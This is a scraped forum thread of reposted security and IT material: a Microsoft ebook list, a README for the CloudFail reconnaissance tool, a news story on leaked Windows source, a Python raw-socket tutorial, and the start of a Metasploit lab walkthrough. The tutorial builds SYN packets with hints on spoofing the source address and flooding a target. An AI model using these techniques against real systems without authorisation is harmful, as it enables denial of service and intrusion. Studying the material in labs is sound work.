      Office | Getting started with MyAnalytics | DOC
      Office | How To Recover That Un-Saved Office Document | PDF
      Office | InfoPath 2013 Keyboard Shortcuts | PDF
      Office | Keyboard shortcuts for Microsoft Outlook 2013 and 2016 | DOC
      Office | Keyboard shortcuts for Microsoft Word 2016 for Windows | DOC
      Office | Licensing Microsoft Office 365 ProPlus Subscription Service in Volume Licensing | PDF
      Office | Licensing Microsoft Office software in Volume Licensing | PDF
      Office | Microsoft Access 2013 Quick Start Guide | PDF
      Office | Microsoft Classroom Deployment | PDF
      Office | Microsoft Excel 2013 Quick Start Guide | PDF
      Office | Microsoft Excel 2016 for Mac Quick Start Guide | PDF
      Office | Microsoft Excel 2016 Quick Start Guide | PDF
      Office | Microsoft Excel Mobile Quick Start Guide | PDF
      Office | Microsoft Excel VLOOKUP Troubleshooting Tips | PDF
      Office | Microsoft OneNote 2013 Quick Start Guide | PDF
      Office | Microsoft OneNote 2016 for Mac Quick Start Guide | PDF
      Office | Microsoft OneNote 2016 Quick Start Guide | PDF
      Office | Microsoft OneNote 2016 Tips and Tricks | PDF
      Office | Microsoft OneNote Mobile Quick Start Guide | PDF
      Office | Microsoft Outlook
2013 Quick Start Guide PDF Office Microsoft Outlook 2016 for Mac Quick Start Guide PDF Office Microsoft Outlook 2016 Quick Start Guide PDF Office Microsoft Outlook 2016 Tips and Tricks PDF Office Microsoft Powerpoint 2013 Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint 2016 for Mac Quick Start Guide PDF Office Microsoft PowerPoint Mobile Quick Start Guide PDF Office Microsoft Project 2013 Quick Start Guide PDF Office Microsoft Publisher 2013 Quick Start Guide PDF Office Microsoft Visio 2013 Quick Start Guide PDF Office Microsoft Word 2013 Quick Start Guide PDF Office Microsoft Word 2016 for Mac Quick Start Guide PDF Office Microsoft Word 2016 Quick Start Guide PDF Office Microsoft Word Mobile Quick Start Guide PDF Office Microsoft® Office 365: Connect and Collaborate Virtually Anywhere, Anytime PDF Office Monitoring and protecting sensitive data in Office 365 DOC Office Office 365 Dedicated Platform vNext Service Release PDF Office Office 365 Licensing Brief PDF Office OneNote 2013 Keyboard Shortcuts PDF Office OneNote Online Keyboard Shortcuts PDF Office Outlook 2013 Keyboard Shortcuts PDF Office Outlook Web App Keyboard Shortcuts PDF Office Own Your Future: Update Your Skills with Resources and Career Ideas from Microsoft® XPS PDF MOBI EPUB Office PowerPoint Online Keyboard Shortcuts PDF Office Project 2013 Keyboard Shortcuts PDF Office Publisher 2013 Keyboard Shortcuts PDF Office Security and Privacy For Microsoft Office 2010 Users PDF MOBI EPUB Office Security Incident Management in Microsoft Office 365 PDF PDF Office SharePoint Online Dedicated & OneDrive for Business Dedicated vNext Service Release PDF Office Skype for Business User Tips & Tricks for Anyone PDF Office Switching from Google Apps to Office 365 for business PDF Office Tenant Isolation in Microsoft Office 365 PDF Office Visio 2013 Keyboard Shortcuts PDF Office Windows 10 Tips and Tricks PDF Office Word 2013 Keyboard Shortcuts PDF 
Office Word Online Keyboard Shortcuts PDF Office Working with SmartArt Graphics Keyboard Shortcuts PDF Power BI Ask, find, and act—harnessing the power of Cortana and Power BI DOC Power BI Bidirectional cross-filtering in SQL Server Analysis Services 2016 and Power BI Desktop DOC Power BI Configuring Power BI mobile apps with Microsoft Intune DOC Power BI Getting started with the Power BI for Android app DOC Power BI Getting Started with the Power BI for iOS app DOC Power BI How to plan capacity for embedded analytics with Power BI Premium PDF Power BI Introducing Microsoft Power BI PDF Power BI Introducing Microsoft Power BI – Mobile PDF Power BI Microsoft Power BI Premium Whitepaper PDF Power BI Power BI mobile apps—enabling data analytics on the go DOC Power BI Propelling digital transformation in manufacturing operations with Power BI DOC Power BI Using Power BI to visualize data insights from Microsoft Dynamics CRM Online DOC PowerShell Microsoft Dynamics GP 2015 R2 PowerShell Users Guide PDF PowerShell PowerShell Integrated Scripting Environment 3.0 PDF PowerShell Simplify Group Policy administration with Windows PowerShell PDF PowerShell Windows PowerShell 3.0 Examples PDF PowerShell Windows PowerShell 3.0 Language Quick Reference PDF PowerShell WINDOWS POWERSHELL 4.0 LANGUAGE QUICK REFERENCE PDF PowerShell Windows PowerShell 4.0 Language Reference Examples PDF PowerShell Windows PowerShell Command Builder User’s Guide PDF PowerShell Windows PowerShell Desired State Configuration Quick Reference PDF PowerShell WINDOWS POWERSHELL INTEGRATED SCRIPTING ENVIRONMENT 4.0 PDF PowerShell Windows PowerShell Web Access PDF PowerShell WMI in PowerShell 3.0 PDF PowerShell WMI in Windows PowerShell 4.0 PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities PDF SharePoint Configuring Microsoft SharePoint Hybrid Capabilities – Mobile PDF SharePoint Deployment guide for Microsoft SharePoint 2013 PDF SharePoint Microsoft SharePoint Server 2016 Architectural 
Models PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – 8.5 X 11 PDF SharePoint Planning and Preparing for Microsoft SharePoint Hybrid – Mobile PDF SharePoint RAP as a Service for SharePoint Server PDF SharePoint SharePoint Online Dedicated Service Description PDF SharePoint SharePoint Products Keyboard Shortcuts PDF SharePoint SharePoint Server 2016 Databases – Quick Reference Guide PDF SharePoint SharePoint Server 2016 Quick Start Guide PDF SQL Server 5 Tips For A Smooth SSIS Upgrade to SQL Server 2012 PDF SQL Server Backup and Restore of SQL Server Databases PDF SQL Server Data Science with Microsoft SQL Server 2016 PDF SQL Server Deeper insights across data with SQL Server 2016 – Technical White Paper PDF SQL Server Deploying SQL Server 2016 PowerPivot and Power View in a Multi-Tier SharePoint 2016 Farm DOC SQL Server Deploying SQL Server 2016 PowerPivot and Power View in SharePoint 2016 DOC SQL Server Guide to Migrating from Oracle to SQL Server 2014 and Azure SQL Database PDF SQL Server Introducing Microsoft Azure™ HDInsight™ PDF MOBI EPUB SQL Server Introducing Microsoft Data Warehouse Fast Track for SQL Server 2016 PDF SQL Server Introducing Microsoft SQL Server 2012 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2014 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 PDF MOBI EPUB SQL Server Introducing Microsoft SQL Server 2016: Mission-Critical Applications, Deeper Insights, Hyperscale Cloud, Preview 2 – Mobile PDF SQL Server Introducing Microsoft Technologies for Data Storage, Movement and Transformation DOC SQL Server Introducing Microsoft® SQL Server® 2008 R2 XPS PDF MOBI EPUB SQL Server Microsoft SharePoint Server 2016 Reviewer’s Guide PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Data Mining Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Analysis Services – Multidimensional Modeling 
Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Reporting Services Quick Step-by-Step PDF SQL Server Microsoft SQL Server 2012 Tutorials: Writing Transact-SQL-Statements PDF SQL Server Microsoft SQL Server 2014 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Licensing Datasheet PDF SQL Server Microsoft SQL Server 2016 Licensing Guide PDF SQL Server Microsoft SQL Server 2016 Mission-Critical Performance Technical White Paper PDF SQL Server Microsoft SQL Server 2016 New Innovations PDF SQL Server Microsoft SQL Server 2016 SP1 Editions PDF SQL Server Microsoft SQL Server In-Memory OLTP and Columnstore Feature Comparison PDF SQL Server RAP as a Service for SQL Server PDF SQL Server SQLCAT’s Guide to: Relational Engine PDF SQL Server Xquery Language Reference PDF Surface Surface Book User Guide PDF Surface Surface Pro 4 User Guide PDF System Center Guide to Microsoft System Center Management Pack for SQL Server 2016 Reporting Services (Native Mode) DOC System Center Guide to System Center Management Pack for Windows Print Server 2016 DOC System Center Introducing Microsoft System Center 2012 R2 PDF MOBI EPUB System Center Microsoft System Center Building a Virtualized Network Solution, Second Edition PDF MOBI EPUB System Center Microsoft System Center Data Protection for the Hybrid Cloud PDF MOBI EPUB System Center Microsoft System Center Deploying Hyper-V with Software-Defined Storage & Networking PDF MOBI EPUB System Center Microsoft System Center Extending Operations Manager Reporting PDF MOBI EPUB System Center Microsoft System Center Introduction to Microsoft Automation Solutions PDF MOBI EPUB System Center Microsoft System Center Operations Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center Software Update Management Field Experience PDF MOBI EPUB System Center Microsoft System Center: Building a Virtualized Network Solution PDF MOBI EPUB System Center Microsoft System Center: Cloud Management with App Controller 
PDF MOBI EPUB System Center Microsoft System Center: Configuration Manager Field Experience PDF MOBI EPUB System Center Microsoft System Center: Designing Orchestrator Runbooks PDF MOBI EPUB System Center Microsoft System Center: Integrated Cloud Platform PDF MOBI EPUB System Center Microsoft System Center: Network Virtualization and Cloud Computing PDF MOBI EPUB System Center Microsoft System Center: Optimizing Service Manager PDF MOBI EPUB System Center Microsoft System Center: Troubleshooting Configuration Manager PDF MOBI EPUB System Center What’s new in System Center 2016 White Paper PDF Virtualization Understanding Microsoft Virtualizaton R2 Solutions XPS PDF Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager PDF MOBI EPUB Windows Client Deploying Windows 10: Automating deployment by using System Center Configuration Manager – Mobile PDF Windows Client Getting the most out of Microsoft Edge DOC Windows Client Introducing Windows 10 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 10 for IT Professionals, Preview Edition PDF MOBI EPUB Windows Client Introducing Windows 8.1 for IT Professionals PDF MOBI EPUB Windows Client Introducing Windows 8: An Overview for IT Professionals PDF MOBI EPUB Windows Client Licensing Windows desktop operating system for use with virtual machines PDF Windows Client Protecting your data with Windows 10 BitLocker DOC Windows Client RAP as a Service for Windows Desktop PDF Windows Client Shortcut Keys for Windows 10 DOC Windows Client Use Reset to restore your Windows 10 PC DOC Windows Client Volume Licensing Reference Guide Windows 10 Desktop Operating System PDF Windows Client Windows 10 IT Pro Essentials Support Secrets PDF PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools PDF MOBI EPUB Windows Client Windows 10 IT Pro Essentials Top 10 Tools – Mobile PDF Windows Client Work Smart: Windows 8 Shortcut Keys PDF Windows Server Automating 
Windows Server 2016 configuration with PowerShell and DSC DOC Windows Server Introducing Windows Server 2008 R2 XPS PDF MOBI EPUB Windows Server Introducing Windows Server 2012 PDF MOBI EPUB Windows Server Introducing Windows Server 2012 R2 PDF MOBI EPUB Windows Server Introducing Windows Server 2016 PDF Windows Server Introducing Windows Server 2016 – Mobile PDF Windows Server Introducing Windows Server 2016 Technical Preview PDF Windows Server Introducing Windows Server 2016 Technical Preview – Mobile PDF Windows Server Introducing Windows Server® 2012 R2 Preview Release PDF MOBI EPUB Windows Server Offline Assessment for Active Directory PDF Windows Server RAP as a Service for Active Directory PDF Windows Server RAP as a Service for Failover Cluster PDF Windows Server RAP as a Service for Internet Information Services PDF Windows Server RAP as a Service for Windows Server Hyper-V PDF Windows Server Windows Server 2016 Licensing PDF
    Source: https://blogs.msdn.microsoft.com/mssmallbiz/2017/07/11/largest-free-microsoft-ebook-giveaway-im-giving-away-millions-of-free-microsoft-ebooks-again-including-windows-10-office-365-office-2016-power-bi-azure-windows-8-1-office-2013-sharepo/
  16. Exercises: http://malware-traffic-analysis.net/training-exercises.html Tutorials: http://malware-traffic-analysis.net/tutorials/index.html
  17. Usr6

    CloudFail

    CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases:

    1. Misconfigured DNS scan using DNSDumpster.com.
    2. Scan the Crimeflare.com database.
    3. Bruteforce scan over 2500 subdomains.

    Please feel free to contribute to this project. If you have an idea or improvement, issue a pull request!

    Disclaimer

    This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to set up CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

    Usage

    To run a scan against a target:

        python cloudfail.py --target seo.com

    To run a scan against a target using Tor:

        service tor start
        (or if you are using Windows or Mac, install Vidalia or just run the Tor Browser)
        python cloudfail.py --target seo.com --tor

    Dependencies

    Python3, argparse, colorama, socket, binascii, datetime, requests

    Download: https://github.com/m0rtem/CloudFail
  18. Exclusive: A massive trove of Microsoft's internal Windows operating system builds and chunks of its core source code have leaked online.

    The data – some 32TB of official and non-public installation images and software blueprints that compress down to 8TB – were uploaded to betaarchive.com, the latest load of files provided just earlier this week. It is believed the confidential data in this dump was exfiltrated from Microsoft's in-house systems around March this year.

    The leaked code is Microsoft's Shared Source Kit: according to people who have seen its contents, it includes the source to the base Windows 10 hardware drivers plus Redmond's PnP code, its USB and Wi-Fi stacks, its storage drivers, and ARM-specific OneCore kernel code.

    Anyone who has this information can scour it for security vulnerabilities, which could be exploited to hack Windows systems worldwide. The code runs at the heart of the operating system, at some of its most trusted levels.

    [Image caption: Leaked ... Screenshot of a Beta Archive posting announcing on Monday, June 19, the addition of Microsoft's confidential source code archive]

    In addition to this, top-secret builds of Windows 10 and Windows Server 2016, none of which have been released to the public, have been leaked among copies of officially released versions. The confidential Windows team-only internal builds were created by Microsoft engineers for bug-hunting and testing purposes, and include private debugging symbols that are usually stripped out for public releases. This software includes, for example, prerelease Windows 10 "Redstone" builds and unreleased 64-bit ARM flavors of Windows.

    There are, we think, too many versions now dumped online for Microsoft to revoke via its Secure Boot mechanism, meaning the tech giant can't use its firmware security mechanisms to prevent people booting the prerelease operating systems.

    Also in the leak are multiple versions of Microsoft's Windows 10 Mobile Adaptation Kit, a confidential software toolset to get the operating system running on various portable and mobile devices. Netizens with access to Beta Archive's private repo of material can, even now, still get hold of the divulged data completely for free. It is being described by some as a bigger leak than the Windows 2000 source code blab in 2004.

    Spokespeople for Microsoft declined to comment.

    Updated to add: Beta Archive's administrators are in the process of removing non-public Microsoft components and builds from its FTP server and its forums. For example, all mention of the Shared Source Kit has been erased from its June 19 post. We took some screenshots before any material was scrubbed from sight. You'll notice from the screenshot above in the article and the forum post that the source kit has disappeared between the Microsoft Windows 10 Debug Symbols and Diamond Monster 3D II Starter Pack. The source kit is supposed to be available to only "qualified customers, enterprises, governments, and partners for debugging and reference purposes."

    In a statement, Beta Archive said: "The 'Shared Source Kit' folder did exist on the FTP until [The Register's] article came to light. We have removed it from our FTP and listings pending further review just in case we missed something in our initial release. We currently have no plans to restore it until a full review of its contents is carried out and it is deemed acceptable under our rules."

    Source: https://www.theregister.co.uk/2017/06/23/windows_10_leak/
  19. Raw sockets allow a program or application to provide custom headers for a specific protocol (TCP/IP) which are otherwise provided by the kernel/OS network stack. In simpler terms, they are for adding custom headers instead of the headers provided by the underlying operating system.

    Raw socket support is available natively in the socket API on Linux. This is different from Windows, where it is absent (it became available in Windows 2000/XP/XP SP1 but was removed later). Although raw sockets don't find much use in common networking applications, they are used widely in applications related to network security.

    In this article we are going to create raw TCP/IP packets. For this we need to know how to make a proper IP header and TCP header. A packet = IP header + TCP header + data. So let's have a look at the structures.

    IP header

    According to RFC 791:

         0                   1                   2                   3
         0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |Version|  IHL  |Type of Service|          Total Length         |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |         Identification        |Flags|      Fragment Offset    |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |  Time to Live |    Protocol   |         Header Checksum       |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                       Source Address                          |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                    Destination Address                        |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                    Options                    |    Padding    |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Every single number is 1 bit. So for example the Version field is 4 bits. The header must be constructed exactly as shown.

    TCP header

    Next comes the TCP header. According to RFC 793:

         0                   1                   2                   3
         0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |          Source Port          |       Destination Port        |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                        Sequence Number                        |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                    Acknowledgment Number                      |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |  Data |           |U|A|P|R|S|F|                               |
        | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
        |       |           |G|K|H|T|N|N|                               |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |           Checksum            |         Urgent Pointer        |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                    Options                    |    Padding    |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |                             data                              |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Create a raw socket

    A raw socket can be created in Python like this:

        import socket, sys

        # create a raw socket
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        except socket.error as msg:
            print('Socket could not be created. Error Code : ' + str(msg.errno) + ' Message ' + msg.strerror)
            sys.exit()

    To create a raw socket, the program must have root privileges on the system. For example, on Ubuntu run the program with sudo. The above example creates a raw socket of type IPPROTO_RAW, which is a raw IP packet. This means that we provide everything, including the IP header.

    Once the socket is created, the next thing is to create and construct the packet that is to be sent out. C-like structures are not available in Python, therefore the functions called pack and unpack have to be used to create the packet in the structure specified above.

    So first, let's make the IP header:

        import socket
        from struct import pack

        source_ip = '192.168.1.101'
        dest_ip = '192.168.1.1'  # or socket.gethostbyname('www.google.com')

        # ip header fields
        ip_ihl = 5
        ip_ver = 4
        ip_tos = 0
        ip_tot_len = 0  # kernel will fill the correct total length
        ip_id = 54321   # Id of this packet
        ip_frag_off = 0
        ip_ttl = 255
        ip_proto = socket.IPPROTO_TCP
        ip_check = 0    # kernel will fill the correct checksum
        ip_saddr = socket.inet_aton(source_ip)  # Spoof the source ip address if you want to
        ip_daddr = socket.inet_aton(dest_ip)

        ip_ihl_ver = (ip_ver << 4) + ip_ihl

        # the ! in the pack format string means network order
        ip_header = pack('!BBHHHBBH4s4s', ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)

    Now ip_header has the data for the IP header. As for the usage of the pack function: it packs some values as bytes, some as 16-bit fields and some as 32-bit fields.

    Next comes the TCP header:

        # tcp header fields
        tcp_source = 1234  # source port
        tcp_dest = 80      # destination port
        tcp_seq = 454
        tcp_ack_seq = 0
        tcp_doff = 5  # 4 bit field, size of tcp header, 5 * 4 = 20 bytes
        # tcp flags
        tcp_fin = 0
        tcp_syn = 1
        tcp_rst = 0
        tcp_psh = 0
        tcp_ack = 0
        tcp_urg = 0
        tcp_window = 5840  # maximum allowed window size; pack('!H') below converts to network order, so no htons() here
        tcp_check = 0
        tcp_urg_ptr = 0

        tcp_offset_res = (tcp_doff << 4) + 0
        tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh << 3) + (tcp_ack << 4) + (tcp_urg << 5)

        # the ! in the pack format string means network order
        tcp_header = pack('!HHLLBBHHH', tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)

    The construction of the TCP header is similar to the IP header. The TCP header has a field called checksum which needs to be filled in correctly. A pseudo header is constructed to compute the checksum. The checksum is calculated over the TCP header along with the data. The checksum is necessary to detect errors in the transmission on the receiver side.

    Code

    Here is the full code to send a raw packet:

        '''
            Raw sockets on Linux
            Silver Moon (m00n.silv3r@gmail.com)
        '''

        # some imports
        import socket, sys
        from struct import *

        # checksum function needed for calculating the checksum
        def checksum(msg):
            # pad an odd-length message with a zero byte so the byte pairs line up
            if len(msg) % 2:
                msg += b'\x00'
            s = 0
            # loop taking 2 bytes at a time (little-endian word order; see the pack('H') note below)
            for i in range(0, len(msg), 2):
                w = msg[i] + (msg[i+1] << 8)
                s = s + w
            s = (s >> 16) + (s & 0xffff)
            s = s + (s >> 16)
            # complement and mask to a 2 byte short
            s = ~s & 0xffff
            return s

        # create a raw socket
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        except socket.error as msg:
            print('Socket could not be created. Error Code : ' + str(msg.errno) + ' Message ' + msg.strerror)
            sys.exit()

        # tell kernel not to put in headers, since we are providing it; when using IPPROTO_RAW this is not necessary
        # s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

        # now start constructing the packet
        packet = b''

        source_ip = '192.168.1.101'
        dest_ip = '192.168.1.1'  # or socket.gethostbyname('www.google.com')

        # ip header fields
        ip_ihl = 5
        ip_ver = 4
        ip_tos = 0
        ip_tot_len = 0  # kernel will fill the correct total length
        ip_id = 54321   # Id of this packet
        ip_frag_off = 0
        ip_ttl = 255
        ip_proto = socket.IPPROTO_TCP
        ip_check = 0    # kernel will fill the correct checksum
        ip_saddr = socket.inet_aton(source_ip)  # Spoof the source ip address if you want to
        ip_daddr = socket.inet_aton(dest_ip)

        ip_ihl_ver = (ip_ver << 4) + ip_ihl

        # the ! in the pack format string means network order
        ip_header = pack('!BBHHHBBH4s4s', ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr)

        # tcp header fields
        tcp_source = 1234  # source port
        tcp_dest = 80      # destination port
        tcp_seq = 454
        tcp_ack_seq = 0
        tcp_doff = 5  # 4 bit field, size of tcp header, 5 * 4 = 20 bytes
        # tcp flags
        tcp_fin = 0
        tcp_syn = 1
        tcp_rst = 0
        tcp_psh = 0
        tcp_ack = 0
        tcp_urg = 0
        tcp_window = 5840  # maximum allowed window size; pack('!H') below converts to network order, so no htons() here
        tcp_check = 0
        tcp_urg_ptr = 0

        tcp_offset_res = (tcp_doff << 4) + 0
        tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh << 3) + (tcp_ack << 4) + (tcp_urg << 5)

        # the ! in the pack format string means network order
        tcp_header = pack('!HHLLBBHHH', tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)

        user_data = b'Hello, how are you'

        # pseudo header fields
        source_address = socket.inet_aton(source_ip)
        dest_address = socket.inet_aton(dest_ip)
        placeholder = 0
        protocol = socket.IPPROTO_TCP
        tcp_length = len(tcp_header) + len(user_data)

        psh = pack('!4s4sBBH', source_address, dest_address, placeholder, protocol, tcp_length)
        psh = psh + tcp_header + user_data

        tcp_check = checksum(psh)
        # print(tcp_check)

        # make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order
        # (checksum() summed little-endian words, so the native 'H' format writes the right bytes on a little-endian host)
        tcp_header = pack('!HHLLBBH', tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H', tcp_check) + pack('!H', tcp_urg_ptr)

        # final full packet - syn packets dont have any data
        packet = ip_header + tcp_header + user_data

        # Send the packet finally - the port specified has no effect
        s.sendto(packet, (dest_ip, 0))

        # put this in a loop if you want to flood the target

    Run the above program from the terminal and check the network traffic using a packet sniffer like Wireshark. It should show the packet.

    Raw sockets find application in the field of network security. The above example can be used to code a TCP SYN flood program. SYN flood programs are used in DoS attacks. Raw sockets are also used to code packet sniffers, port scanners etc.

    Source: http://www.binarytides.com/raw-socket-programming-in-python-linux/
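    The receive-side counterpart of the packet built above, as an added example that is not part of the article or its author's code: it packs an IPv4 header plus TCP SYN with the same struct layouts and an RFC 1071 checksum, then parses the bytes back and verifies both checksums the way a sniffer or IDS would. The checksum offsets (10 into the IP header, 16 into the TCP header) follow the RFC diagrams above; the addresses, ports, window and payload are the article's sample values, and the helper names are my own.

```python
import socket
from struct import pack, unpack

FLAG_NAMES = ('FIN', 'SYN', 'RST', 'PSH', 'ACK', 'URG')   # TCP flag bits 0..5


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words (odd length zero-padded)."""
    if len(data) % 2:
        data += b'\x00'
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xffff) + (total >> 16)
    return (~total) & 0xffff


def build_packet(src_ip, dst_ip, sport, dport, flags, payload=b'',
                 seq=454, ack=0, window=5840, ident=54321, ttl=255):
    """IPv4 header + TCP header + payload with both checksums filled in."""
    saddr, daddr = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # TCP header with checksum 0, then checksum over pseudo-header + segment
    tcp = pack('!HHLLBBHHH', sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    pseudo = pack('!4s4sBBH', saddr, daddr, 0, socket.IPPROTO_TCP, len(tcp) + len(payload))
    tcp = tcp[:16] + pack('!H', inet_checksum(pseudo + tcp + payload)) + tcp[18:]
    # IPv4 header: here we fill total length and checksum ourselves
    # (the kernel does it for us on an IPPROTO_RAW socket, as the article notes)
    total_len = 20 + len(tcp) + len(payload)
    ip = pack('!BBHHHBBH4s4s', (4 << 4) | 5, 0, total_len, ident, 0, ttl,
              socket.IPPROTO_TCP, 0, saddr, daddr)
    ip = ip[:10] + pack('!H', inet_checksum(ip)) + ip[12:]
    return ip + tcp + payload


def parse_packet(raw: bytes) -> dict:
    """Unpack an IPv4/TCP packet and verify both checksums."""
    (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _ip_chk,
     saddr, daddr) = unpack('!BBHHHBBH4s4s', raw[:20])
    ihl = (ver_ihl & 0x0f) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or proto != socket.IPPROTO_TCP:
        raise ValueError('not an IPv4/TCP packet')
    # A header whose checksum field is already filled in sums to zero
    ip_ok = inet_checksum(raw[:ihl]) == 0
    segment = raw[ihl:total_len]
    (sport, dport, seq, ack, off_res, flags, window, _tcp_chk,
     _urg) = unpack('!HHLLBBHHH', segment[:20])
    doff = (off_res >> 4) * 4
    pseudo = pack('!4s4sBBH', saddr, daddr, 0, proto, len(segment))
    tcp_ok = inet_checksum(pseudo + segment) == 0
    return {
        'src': socket.inet_ntoa(saddr), 'dst': socket.inet_ntoa(daddr), 'ttl': ttl,
        'sport': sport, 'dport': dport, 'seq': seq, 'ack': ack, 'window': window,
        'flags': [n for bit, n in enumerate(FLAG_NAMES) if flags & (1 << bit)],
        'payload': segment[doff:],
        'ip_checksum_ok': ip_ok, 'tcp_checksum_ok': tcp_ok,
    }


if __name__ == '__main__':
    # Constructed sample: the SYN the article sends, with its "Hello" payload
    pkt = build_packet('192.168.1.101', '192.168.1.1', 1234, 80, 0x02, b'Hello, how are you')
    print(parse_packet(pkt))
```

    Note that the window parses back as 5840 only because it was packed once with '!H'; wrapping the value in socket.htons() as well would byte-swap it twice.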
  20. Step by step Metasploit walkthrough Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and more than often, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go. Step 1: Reconaissance Before actually hacking your way in, you need to find more information about your target. You have to find out the ip adress, running services and possible vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP adress of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own adress, so the ip adress of my host should be 192.168.0.206. Note: as I wrote this blogpost over a longer period, the used ip addresses later in this blogpost of the target machine can vary from 192.168.0.205 to 192.168.0.206 Let's continue with an Nmap scan to find running services: nmap -sV 192.168.0.206 Copy We find an Apache webserver running on port 8022. Let's look into that. Open firefox and enter the IP adress + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick google search learns us there is an exploit available! Bingo! Step 2: exploit a service to get a shell Now we have identified a vulnerable service and an available exploit, it's start to exploit the machine: Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering: search ManageEngine Copy After executing the search command, we find the Manage Engine Desktop Central 9 exploit we've found via google. 
